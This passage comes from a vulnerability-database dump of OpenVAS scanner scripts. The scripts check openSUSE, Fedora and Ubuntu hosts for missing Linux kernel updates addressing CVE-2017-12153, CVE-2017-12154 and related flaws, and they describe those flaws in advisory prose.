net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the 'CR8-load exiting' and 'CR8-store\n exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR\n shadow' vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382 ...\n\n Description truncated, please see the referenced URL(s) 
for more information.\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2739-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.90~18.32.1\", 
rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-09T19:31:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-06-08T00:00:00", 
"published": "2017-09-18T00:00:00", "id": "OPENVAS:1361412562310873383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873383", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-7369ea045c", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2017-7369ea045c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873383\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-18 07:35:30 +0200 (Mon, 18 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-7369ea045c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update 
for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-7369ea045c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/POCXAJOXOL6EYLO5PB4L2ENCPQ3V7RCZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.12.13~300.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:30:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-06-08T00:00:00", "published": "2017-09-28T00:00:00", "id": "OPENVAS:1361412562310873452", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873452", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-e07d7fb18e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel 
FEDORA-2017-e07d7fb18e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873452\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-28 09:15:53 +0200 (Thu, 28 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-e07d7fb18e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", 
value:\"2017-e07d7fb18e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OXUDSKTQCMRM4NNOUPVKYWI52ARTFLEF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.12.13~200.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843354", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843354", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3469-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3469_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3469-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843354\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:02:28 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12192\", \"CVE-2017-14051\",\n \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\",\n \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3469-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3469-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. 
This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Anthony Perard discovered that the Xen virtual block driver\n did not properly initialize some data structures before passing them to user\n space. A local attacker in a guest VM could use this to expose sensitive\n information from the host OS or other guest VMs. (CVE-2017-10911) Bo Zhang\n discovered that the netlink wireless configuration interface in the Linux kernel\n did not properly validate attributes when handling certain requests. A local\n attacker with the CAP_NET_ADMIN could use this to cause a denial of service\n (system crash). (CVE-2017-12153) It was discovered that the nested KVM\n implementation in the Linux kernel in some situations did not properly prevent\n second level guests from reading and writing the hardware CR8 register. A local\n attacker in a guest could use this to cause a denial of service (system crash).\n It was discovered that the key management subsystem in the Linux kernel did not\n properly restrict key reads on negatively instantiated keys. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-12192) It\n was discovered that an integer overflow existed in the sysfs interface for the\n QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker\n could use this to cause a denial of service (system crash). (CVE-2017-14051) It\n was discovered that the ATI Radeon framebuffer driver in the Linux kernel did\n not properly initialize a data structure returned to user space. A local\n attacker could use this to expose sensitive information (kernel memory).\n (CVE-2017-14156) Dave Chinner discovered that the XFS filesystem did not enforce\n that the realtime inode flag was settable only on filesystems on a realtime\n device. A local attacker could use this to cause a denial of service (system\n crash). 
(CVE-2017-14340) ChunYu Wang discovered that the iSCSI transport\n implementation in the Linux kernel did not properly validate data structures. A\n local attacker could use this to cause a denial of service (system crash).\n (CVE-2017-14489) It was discovered that the generic SCSI driver in the Linux\n kernel did not properly initialize data returned to user space in some\n situations. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14991) Dmitry Vyukov discovered that the Floating\n Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts\n to set reserved bits in a tas ... Description truncated, for more information\n please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3469-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3469-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic-lpae\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-4.4.0-98-lowlatency\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-e500mc\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-smp\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-emb\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-smp\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843358", "type": "openvas", "title": "Ubuntu Update for linux USN-3469-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3469_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3469-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843358\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:04:22 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12192\", \"CVE-2017-14051\",\n \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\",\n \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3469-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Anthony Perard discovered that the Xen\n virtual block driver did not properly initialize some data structures before\n passing them to user space. A local attacker in a guest VM could use this to\n expose sensitive information from the host OS or other guest VMs.\n (CVE-2017-10911) Bo Zhang discovered that the netlink wireless configuration\n interface in the Linux kernel did not properly validate attributes when handling\n certain requests. A local attacker with the CAP_NET_ADMIN could use this to\n cause a denial of service (system crash). 
(CVE-2017-12153) It was discovered\n that the nested KVM implementation in the Linux kernel in some situations did\n not properly prevent second level guests from reading and writing the hardware\n CR8 register. A local attacker in a guest could use this to cause a denial of\n service (system crash). It was discovered that the key management subsystem in\n the Linux kernel did not properly restrict key reads on negatively instantiated\n keys. A local attacker could use this to cause a denial of service (system\n crash). (CVE-2017-12192) It was discovered that an integer overflow existed in\n the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\n A local privileged attacker could use this to cause a denial of service (system\n crash). (CVE-2017-14051) It was discovered that the ATI Radeon framebuffer\n driver in the Linux kernel did not properly initialize a data structure returned\n to user space. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14156) Dave Chinner discovered that the XFS\n filesystem did not enforce that the realtime inode flag was settable only on\n filesystems on a realtime device. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2017-14340) ChunYu Wang discovered that\n the iSCSI transport implementation in the Linux kernel did not properly validate\n data structures. A local attacker could use this to cause a denial of service\n (system crash). (CVE-2017-14489) It was discovered that the generic SCSI driver\n in the Linux kernel did not properly initialize data returned to user space in\n some situations. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14991) Dmitry Vyukov discovered that the Floating\n Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts\n to set reserved bits in a task's extended state (xstate) area. 
A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-15537)\n Pengfei Wang discovered that the Turtle Beach MultiSound audio device driver in\n the Linux kernel contained race conditions when fetching from the ring-buffer. A\n local attacker could use this to cause a denial of service (infinite loop).\n (CVE-2017-9984, CVE-2017-9985)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3469-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3469-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 